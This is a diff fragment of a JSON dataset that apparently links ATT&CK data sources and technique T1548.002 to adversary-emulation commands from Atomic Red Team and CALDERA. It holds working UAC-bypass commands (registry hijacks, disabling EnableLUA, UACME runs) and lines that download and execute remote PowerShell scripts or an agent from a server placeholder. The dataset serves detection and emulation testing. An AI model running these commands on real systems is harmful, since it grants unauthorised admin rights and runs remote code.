"target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1548.002", + "command_list": [ + "reg.exe add hkcu\\software\\classes\\mscfile\\shell\\open\\command /ve /d \"C:\\Windows\\System32\\cmd.exe\" /f\ncmd.exe /c eventvwr.msc\n", + "New-Item \"HKCU:\\software\\classes\\mscfile\\shell\\open\\command\" -Force\nSet-ItemProperty \"HKCU:\\software\\classes\\mscfile\\shell\\open\\command\" -Name \"(default)\" -Value \"C:\\Windows\\System32\\cmd.exe\" -Force\nStart-Process \"C:\\Windows\\System32\\eventvwr.msc\"\n", + "reg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /ve /d \"C:\\Windows\\System32\\cmd.exe\" /f\nreg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /v \"DelegateExecute\" /f\nfodhelper.exe\n", + "New-Item \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Force\nNew-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force\nSet-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"(default)\" -Value \"C:\\Windows\\System32\\cmd.exe\" -Force\nStart-Process \"C:\\Windows\\System32\\fodhelper.exe\"\n", + "New-Item \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Force\nNew-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force\nSet-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"(default)\" -Value \"C:\\Windows\\System32\\cmd.exe\" -Force\nStart-Process \"C:\\Windows\\System32\\ComputerDefaults.exe\"\n", + "mkdir \"\\\\?\\C:\\Windows \\System32\\\"\ncopy \"C:\\Windows\\System32\\cmd.exe\" \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\nmklink c:\\testbypass.exe \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\n", + "New-Item -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Value 'cmd.exe /c notepad.exe'\nNew-ItemProperty -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Name \"DelegateExecute\"\nStart-Process -FilePath $env:windir\\system32\\sdclt.exe\nStart-Sleep -s 3\n", + "reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f\n", + "PathToAtomicsFolder\\T1548.002\\src\\T1548.002.bat\n", + "\"%temp%\\uacme\\23 Akagi64.exe\"\n", + "\"%temp%\\uacme\\31 Akagi64.exe\"\n", + "\"%temp%\\uacme\\33 Akagi64.exe\"\n", + "\"%temp%\\uacme\\34 Akagi64.exe\"\n", + "\"%temp%\\uacme\\39 Akagi64.exe\"\n", + "\"%temp%\\uacme\\56 Akagi64.exe\"\n", + "\"%temp%\\uacme\\59 Akagi64.exe\"\n", + "\"%temp%\\uacme\\61 Akagi64.exe\"\n", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nUACBypass -noninteractive -command \"C:\\windows\\system32\\cmd.exe\" -technique magic", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nUACBypass -noninteractive -command \"C:\\windows\\system32\\calc.exe\" -technique ccmstp", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nUACBypass -noninteractive -command \"C:\\windows\\system32\\cmd.exe\" -technique DiskCleanup", + "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/dccuac.ps1')", + "New-ItemProperty -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system -Name EnableLUA -PropertyType DWord -Value 0 -Force\n", + ".\\Akagi64.exe 30 C:\\Windows\\System32\\cmd.exe\n", + ".\\Akagi64.exe 45 C:\\Windows\\System32\\cmd.exe\n", + "$url=\"#{server}/file/download\"; $wc=New-Object System.Net.WebClient; $wc.Headers.add(\"platform\",\"windows\"); $wc.Headers.add(\"file\",\"sandcat.go\"); $data=$wc.DownloadData($url); $name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\"); [io.file]::WriteAllBytes(\"C:\\Users\\Public\\$name.exe\",$data);\n$job = Start-Job -ScriptBlock { Import-Module -Name .\\Bypass-UAC.ps1; Bypass-UAC -Command \"C:\\Users\\Public\\$name.exe -group #{group}\"; };\nReceive-Job -Job $job -Wait;\n", + "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"sandcat.go\");\n$wc.Headers.add(\"server\",\"#{server}\");\n$wc.Headers.add(\"defaultSleep\",\"60\");\n$wc.Headers.add(\"defaultGroup\",\"bypassed_u_bro\");\n$data=$wc.DownloadData($url);\n$name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\");\n[io.file]::WriteAllBytes(\"C:\\Users\\Public\\$name.exe\",$data);\n.\\Akagi64.exe 32 \"C:\\Users\\Public\\$name.exe -server #{server}\"\n" + ], + "commands": [ + { + "command": "reg.exe add hkcu\\software\\classes\\mscfile\\shell\\open\\command /ve /d \"C:\\Windows\\System32\\cmd.exe\" /f\ncmd.exe /c eventvwr.msc\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "New-Item \"HKCU:\\software\\classes\\mscfile\\shell\\open\\command\" -Force\nSet-ItemProperty \"HKCU:\\software\\classes\\mscfile\\shell\\open\\command\" -Name \"(default)\" -Value \"C:\\Windows\\System32\\cmd.exe\" -Force\nStart-Process \"C:\\Windows\\System32\\eventvwr.msc\"\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "reg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /ve /d \"C:\\Windows\\System32\\cmd.exe\" /f\nreg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /v \"DelegateExecute\" /f\nfodhelper.exe\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "New-Item \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Force\nNew-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force\nSet-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"(default)\" -Value \"C:\\Windows\\System32\\cmd.exe\" -Force\nStart-Process \"C:\\Windows\\System32\\fodhelper.exe\"\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "New-Item \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Force\nNew-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force\nSet-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"(default)\" -Value \"C:\\Windows\\System32\\cmd.exe\" -Force\nStart-Process \"C:\\Windows\\System32\\ComputerDefaults.exe\"\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "mkdir \"\\\\?\\C:\\Windows \\System32\\\"\ncopy \"C:\\Windows\\System32\\cmd.exe\" \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\nmklink c:\\testbypass.exe \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "New-Item -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Value 'cmd.exe /c notepad.exe'\nNew-ItemProperty -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Name \"DelegateExecute\"\nStart-Process -FilePath $env:windir\\system32\\sdclt.exe\nStart-Sleep -s 3\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "PathToAtomicsFolder\\T1548.002\\src\\T1548.002.bat\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "\"%temp%\\uacme\\23 Akagi64.exe\"\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "\"%temp%\\uacme\\31 Akagi64.exe\"\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "\"%temp%\\uacme\\33 Akagi64.exe\"\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "\"%temp%\\uacme\\34 Akagi64.exe\"\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "\"%temp%\\uacme\\39 Akagi64.exe\"\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "\"%temp%\\uacme\\56 Akagi64.exe\"\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "\"%temp%\\uacme\\59 Akagi64.exe\"\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "\"%temp%\\uacme\\61 Akagi64.exe\"\n", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nUACBypass -noninteractive -command \"C:\\windows\\system32\\cmd.exe\" -technique magic", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nUACBypass -noninteractive -command \"C:\\windows\\system32\\calc.exe\" -technique ccmstp", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nUACBypass -noninteractive -command \"C:\\windows\\system32\\cmd.exe\" -technique DiskCleanup", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/dccuac.ps1')", + "source": "atomics/T1548.002/T1548.002.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + { + "command": "New-ItemProperty -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system -Name EnableLUA -PropertyType DWord -Value 0 -Force\n", + "source": "data/abilities/privilege-escalation/665432a4-42e7-4ee1-af19-a9a8c9455d0c.yml", + "name": "Set a registry key to allow UAC bypass" + }, + { + "command": ".\\Akagi64.exe 30 C:\\Windows\\System32\\cmd.exe\n", + "source": "data/abilities/privilege-escalation/95ad5d69-563e-477b-802b-4855bfb3be09.yml", + "name": "Dll Hijack of WOW64 logger wow64log.dll using Akagi.exe" + }, + { + "command": ".\\Akagi64.exe 45 C:\\Windows\\System32\\cmd.exe\n", + "source": "data/abilities/privilege-escalation/b7344901-0b02-4ead-baf6-e3f629ed545f.yml", + "name": "executes the slui exe file handler hijack" + }, + { + "command": "$url=\"#{server}/file/download\"; $wc=New-Object System.Net.WebClient; $wc.Headers.add(\"platform\",\"windows\"); $wc.Headers.add(\"file\",\"sandcat.go\"); $data=$wc.DownloadData($url); $name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\"); [io.file]::WriteAllBytes(\"C:\\Users\\Public\\$name.exe\",$data);\n$job = Start-Job -ScriptBlock { Import-Module -Name .\\Bypass-UAC.ps1; Bypass-UAC -Command \"C:\\Users\\Public\\$name.exe -group #{group}\"; };\nReceive-Job -Job $job -Wait;\n", + "source": "data/abilities/privilege-escalation/e3db134c-4aed-4c5a-9607-c50183c9ef9e.yml", + "name": "Bypass user account controls - medium" + }, + { + "command": "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"sandcat.go\");\n$wc.Headers.add(\"server\",\"#{server}\");\n$wc.Headers.add(\"defaultSleep\",\"60\");\n$wc.Headers.add(\"defaultGroup\",\"bypassed_u_bro\");\n$data=$wc.DownloadData($url);\n$name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\");\n[io.file]::WriteAllBytes(\"C:\\Users\\Public\\$name.exe\",$data);\n.\\Akagi64.exe 32 \"C:\\Users\\Public\\$name.exe -server #{server}\"\n", + "source": "data/abilities/privilege-escalation/e99cce5c-cb7e-4a6e-8a09-1609a221b90a.yml", + "name": "UIPI bypass with uiAccess application" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1548.002", + "display_name": "Abuse Elevation Control Mechanism: Bypass User Access Control", + "atomic_tests": [ + { + "name": "Bypass UAC using Event Viewer (cmd)", + "auto_generated_guid": "5073adf8-9a50-4bd9-b298-a9bd2ead8af9", + "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\nUpon execution command prompt should be launched with administrative privelages\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "executable_binary": { + "description": "Binary to execute with UAC Bypass", + "type": "Path", + "default": "C:\\Windows\\System32\\cmd.exe" + } + }, + "executor": { + "command": "reg.exe add hkcu\\software\\classes\\mscfile\\shell\\open\\command /ve /d \"#{executable_binary}\" /f\ncmd.exe /c eventvwr.msc\n", + "cleanup_command": "reg.exe delete hkcu\\software\\classes\\mscfile /f >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Bypass UAC using Event Viewer (PowerShell)", + "auto_generated_guid": "a6ce9acf-842a-4af6-8f79-539be7608e2b", + "description": "PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\nUpon execution command prompt should be launched with administrative privelages\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "executable_binary": { + "description": "Binary to execute with UAC Bypass", + "type": "Path", + "default": "C:\\Windows\\System32\\cmd.exe" + } + }, + "executor": { + "command": "New-Item \"HKCU:\\software\\classes\\mscfile\\shell\\open\\command\" -Force\nSet-ItemProperty \"HKCU:\\software\\classes\\mscfile\\shell\\open\\command\" -Name \"(default)\" -Value \"#{executable_binary}\" -Force\nStart-Process \"C:\\Windows\\System32\\eventvwr.msc\"\n", + "cleanup_command": "Remove-Item \"HKCU:\\software\\classes\\mscfile\" -force -Recurse -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Bypass UAC using Fodhelper", + "auto_generated_guid": "58f641ea-12e3-499a-b684-44dee46bd182", + "description": "Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.\nUpon execution, \"The operation completed successfully.\" will be shown twice and command prompt will be opened.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "executable_binary": { + "description": "Binary to execute with UAC Bypass", + "type": "Path", + "default": "C:\\Windows\\System32\\cmd.exe" + } + }, + "executor": { + "command": "reg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /ve /d \"#{executable_binary}\" /f\nreg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /v \"DelegateExecute\" /f\nfodhelper.exe\n", + "cleanup_command": "reg.exe delete hkcu\\software\\classes\\ms-settings /f >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Bypass UAC using Fodhelper - PowerShell", + "auto_generated_guid": "3f627297-6c38-4e7d-a278-fc2563eaaeaa", + "description": "PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.\nUpon execution command prompt will be opened.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "executable_binary": { + "description": "Binary to execute with UAC Bypass", + "type": "Path", + "default": "C:\\Windows\\System32\\cmd.exe" + } + }, + "executor": { + "command": "New-Item \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Force\nNew-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force\nSet-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"(default)\" -Value \"#{executable_binary}\" -Force\nStart-Process \"C:\\Windows\\System32\\fodhelper.exe\"\n", + "cleanup_command": "Remove-Item \"HKCU:\\software\\classes\\ms-settings\" -force -Recurse -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Bypass UAC using ComputerDefaults (PowerShell)", + "auto_generated_guid": "3c51abf2-44bf-42d8-9111-dc96ff66750f", + "description": "PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10\nUpon execution administrative command prompt should open\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "executable_binary": { + "description": "Binary to execute with UAC Bypass", + "type": "Path", + "default": "C:\\Windows\\System32\\cmd.exe" + } + }, + "executor": { + "command": "New-Item \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Force\nNew-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force\nSet-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"(default)\" -Value \"#{executable_binary}\" -Force\nStart-Process \"C:\\Windows\\System32\\ComputerDefaults.exe\"\n", + "cleanup_command": "Remove-Item \"HKCU:\\software\\classes\\ms-settings\" -force -Recurse -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Bypass UAC by Mocking Trusted Directories", + "auto_generated_guid": "f7a35090-6f7f-4f64-bb47-d657bf5b10c1", + "description": "Creates a fake \"trusted directory\" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems\nUpon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "executable_binary": { + "description": "Binary to execute with UAC Bypass", + "type": "Path", + "default": "C:\\Windows\\System32\\cmd.exe" + } + }, + "executor": { + "command": "mkdir \"\\\\?\\C:\\Windows \\System32\\\"\ncopy \"#{executable_binary}\" \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\nmklink c:\\testbypass.exe \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\n", + "cleanup_command": "rd \"\\\\?\\C:\\Windows \\\" /S /Q >nul 2>nul\ndel \"c:\\testbypass.exe\" >nul 2>nul\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Bypass UAC using sdclt DelegateExecute", + "auto_generated_guid": "3be891eb-4608-4173-87e8-78b494c029b7", + "description": "Bypasses User Account Control using a fileless method, registry only.\nUpon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe\n[Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)\nAdapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "command.to.execute": { + "description": "Command to execute", + "type": "String", + "default": "cmd.exe /c notepad.exe" + } + }, + "executor": { + "command": "New-Item -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Value '#{command.to.execute}'\nNew-ItemProperty -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Name \"DelegateExecute\"\nStart-Process -FilePath $env:windir\\system32\\sdclt.exe\nStart-Sleep -s 3\n", + "cleanup_command": "Remove-Item -Path \"HKCU:\\Software\\Classes\\Folder\" -Recurse -Force -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Disable UAC using reg.exe", + "auto_generated_guid": "9e8af564-53ec-407e-aaa8-3cb20c3af7f9", + "description": "Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key\nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f\n", + "cleanup_command": "reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 1 /f\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Bypass UAC using SilentCleanup task", + "auto_generated_guid": "28104f8a-4ff1-4582-bcf6-699dce156608", + "description": "Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/\n\nThere is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).\n\nFor example, we can set the windir registry kye to: \"cmd /k REM \"\n\nAnd forcefully run SilentCleanup task:\n\nschtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I\n\nREM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_path": { + "description": "Path to the bat file", + "type": "String", + "default": "PathToAtomicsFolder\\T1548.002\\src\\T1548.002.bat" + } + }, + "executor": { + "command": "#{file_path}\n", + "name": "command_prompt", + "elevation_required": false + } + }, + { + "name": "UACME Bypass Method 23", + "auto_generated_guid": "8ceab7a2-563a-47d2-b5ba-0995211128d7", + "description": "Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.\nNote: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor: Leo Davidson derivative\n\nType:\tDll Hijack\n\nMethod: IFileOperation\n\nTarget:\t\\system32\\pkgmgr.exe\n\nComponent: DismCore.dll\n\nImplementation:\tucmDismMethod\n\nUCM Method:\tUacMethodDISM\n\nhttps://github.com/hfiref0x/UACME\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "uacme_exe": { + "description": "Path to uacme executable", + "type": "Path", + "default": "%temp%\\uacme\\23 Akagi64.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "UACME executable must exist on disk at specified location (#{uacme_exe})\n", + "prereq_command": "$tempPath = cmd /c echo #{uacme_exe}\nif (Test-Path \"$tempPath\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"$env:TEMP\\uacme.zip\"\nExpand-Archive $env:TEMP\\uacme.zip $env:TEMP\\uacme -Force\nRemove-Item $env:TEMP\\uacme.zip -Force\n" + } + ], + "executor": { + "command": "\"#{uacme_exe}\"\n", + "cleanup_command": "powershell Stop-Process -Name cmd -Force -ErrorAction Ignore\npowershell Stop-Process -Name mmc -Force -ErrorAction Ignore\n", + "name": "command_prompt" + } + }, + { + "name": "UACME Bypass Method 31", + "auto_generated_guid": "b0f76240-9f33-4d34-90e8-3a7d501beb15", + "description": "Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.\nNote: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor: Enigma0x3\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\sdclt.exe\n\nComponent: Attacker defined\n\nImplementation:\tucmSdcltIsolatedCommandMethod\n\nUCM Method:\tUacMethodShellSdclt\n\nhttps://github.com/hfiref0x/UACME\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "uacme_exe": { + "description": "Path to uacme executable", + "type": "Path", + "default": "%temp%\\uacme\\31 Akagi64.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "UACME executable must exist on disk at specified location (#{uacme_exe})\n", + "prereq_command": "$tempPath = cmd /c echo 